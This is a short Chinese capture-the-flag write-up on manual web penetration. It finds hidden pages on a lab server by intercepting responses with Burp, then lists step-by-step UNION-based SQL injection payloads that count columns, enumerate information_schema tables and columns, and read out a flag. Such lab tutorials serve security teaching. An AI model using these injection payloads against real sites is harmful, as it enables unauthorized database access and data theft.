手工注入基本思路
目录
-
信息泄露
- 手工注入
渗透思路
1. 返回包信息中泄露重要目录
(1)访问http://112.44.218.141:2014是一个空白页面,开始想到的就是查看robots,然后御剑目录扫描都没有得到有发现目录;然后就使用burp截包,可以看到提示目录welcome_solkdjiejq.php
(2)访问http://112.44.218.141:2014/welcome_solkdjiejq.php得到flag(flag理解为web中一个重要信息):
(3)查看源码得到一个目录/system_jioqwjod.php
访问提示只用本机可以登录
(4)访问http://112.44.218.141:2014/system_jioqwjod.php使用burp截包得到flag:
另外得到location: system_skkkwwwwqad/index.php
2.SQL注入
访问http://112.44.218.141:2014/system_skkkwwwwqad/index.php点击report1
(1)在url后添加一个’报错,存在报错注入点
(2)判断列数使用oder by n#
Order by 2#回显正常
Order by 3#回显错位,那么应该为2列;
(3)判断回显为
id=-1 union select 88,99#回显为第二列位置
(4)暴数据库http://112.44.218.141:2014/system_skkkwwwwqad/index.php?id=-2 union select 1,database()#
(5)暴数据表
暴数据库news下的第一个表f3aagg:
id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 0,1)#
第二个表news:
id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 1,1)#
(6)暴表f3aagg下的字段为f3gg1
id=-2 union select 1,(select column_name from information_schema.columns where table_name="f3aagg" limit 0,1)#
(7)查看内容得到flag{eccbc87e4b5ce2fe28308fd9f2a7baf3}
id=-2 union select 1,(select * from f3aagg limit 0,1)#
这就是sql注入基本的完整思路,按照这样方法可以再查看其它表、字段信息;